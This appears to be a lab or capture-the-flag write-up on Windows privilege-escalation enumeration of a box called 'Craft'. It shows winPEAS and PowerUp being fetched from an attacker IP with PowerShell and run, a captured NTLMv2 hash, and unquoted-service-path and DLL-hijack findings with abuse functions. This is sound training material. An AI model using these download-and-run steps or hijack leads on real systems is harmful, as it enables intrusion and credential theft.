PEAS

Conducting an automated enumeration after performing a manual enumeration

PS C:\tmp> iwr -Uri http://192.168.45.197/winPEASx64.exe -Outfile C:\tmp\winPEASx64.exe

Delivery complete

PS C:\tmp> ./winPEASx64.exe
 
 [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
     
               ((((((((((((((((((((((((((((((((
        (((((((((((((((((((((((((((((((((((((((((((
      ((((((((((((((**********/##########(((((((((((((   
    ((((((((((((********************/#######(((((((((((
    ((((((((******************/@@@@@/****######((((((((((
    ((((((********************@@@@@@@@@@/***,####((((((((((
    (((((********************/@@@@@%@@@@/********##(((((((((
    (((############*********/%@@@@@@@@@/************((((((((
    ((##################(/******/@@@@@/***************((((((
    ((#########################(/**********************(((((
    ((##############################(/*****************(((((
    ((###################################(/************(((((
    ((#######################################(*********(((((
    ((#######(,.***.,(###################(..***.*******(((((
    ((#######*(#####((##################((######/(*****(((((
    ((###################(/***********(##############()(((((
    (((#####################/*******(################)((((((
    ((((############################################)((((((
    (((((##########################################)(((((((
    ((((((########################################)(((((((
    ((((((((####################################)((((((((
    (((((((((#################################)(((((((((
        ((((((((((##########################)(((((((((
              ((((((((((((((((((((((((((((((((((((((
                 ((((((((((((((((((((((((((((((

Executing PEAS

ENV

???????????? User Environment Variables
? Check for some passwords or keys in the env variables 
    COMPUTERNAME: CRAFT
    PSExecutionPolicyPreference: Bypass
    LIBO_VERSION: 7.1.4.2
    LOCALAPPDATA: C:\Users\thecybergeek\AppData\Local
    PSModulePath: C:\Users\thecybergeek\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Program Files\LibreOffice\program;C:\Program Files\LibreOffice\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps;C:\Program Files\LibreOffice\program\..\program
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    PYTHONPATH: C:\Program Files\LibreOffice\program\python-core-3.8.8\lib;C:\Program Files\LibreOffice\program\python-core-3.8.8\lib\site-packages;C:\Program Files\LibreOffice\program
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    LANGUAGE: en_US.UTF-8
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 0101
    USERNAME: thecybergeek
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\Windows\system32\cmd.exe
    SystemDrive: C:
    TEMP: C:\Users\THECYB~1\AppData\Local\Temp
    PUBLIC: C:\Users\Public
    NUMBER_OF_PROCESSORS: 2
    APPDATA: C:\Users\thecybergeek\AppData\Roaming
    URE_BOOTSTRAP: file:///C:/Program%20Files/LibreOffice/program/fundamental.ini
    TMP: C:\Users\THECYB~1\AppData\Local\Temp
    USERPROFILE: C:\Users\thecybergeek
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: CRAFT
 
???????????? System Environment Variables
? Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

LAPS

LSA Protection

Credentials Guard

Cached Creds

AV

UAC

PowerShell

NTLM

thecybergeek::CRAFT:1122334455667788:4c718aa3412c2cb8895978b0627f8298:0101000000000000f650bb55b3a8db018ee94f8e54d49e23000000000800300030000000000000000000000000300000f0805dc4258da05ceb12eadfabf0164415e143bf8acb1b7adb7b7e42108231340a00100000000000000000000000000000000000090000000000000000000000

.NET

Services

Write access to the Apache directory

Modifiable

Installed Programs

Network

DNS Cached

Interesting Files

PowerUp

PS C:\tmp> iwr -Uri http://192.168.45.197/PowerUp.ps1 -Outfile C:\tmp\PowerUp.ps1

Delivery complete

PS C:\tmp> . .\PowerUp.ps1
PS C:\tmp> Invoke-AllChecks
 
 
ServiceName    : ResumeService1
Path           : C:\Program Files\nssm-2.24\win64\nssm.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; 
                 Permissions=AppendData/AddSubdirectory}
StartName      : .\thecybergeek
AbuseFunction  : Write-ServiceBinary -Name 'ResumeService1' -Path <HijackPath>
CanRestart     : False
Name           : ResumeService1
Check          : Unquoted Service Paths
 
ServiceName    : ResumeService1
Path           : C:\Program Files\nssm-2.24\win64\nssm.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; 
                 Permissions=WriteData/AddFile}
StartName      : .\thecybergeek
AbuseFunction  : Write-ServiceBinary -Name 'ResumeService1' -Path <HijackPath>
CanRestart     : False
Name           : ResumeService1
Check          : Unquoted Service Paths
 
ModifiablePath    : C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps
IdentityReference : CRAFT\thecybergeek
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 
                    'C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

Invoking

InfoSec LAB

Explorer

Craft_Automated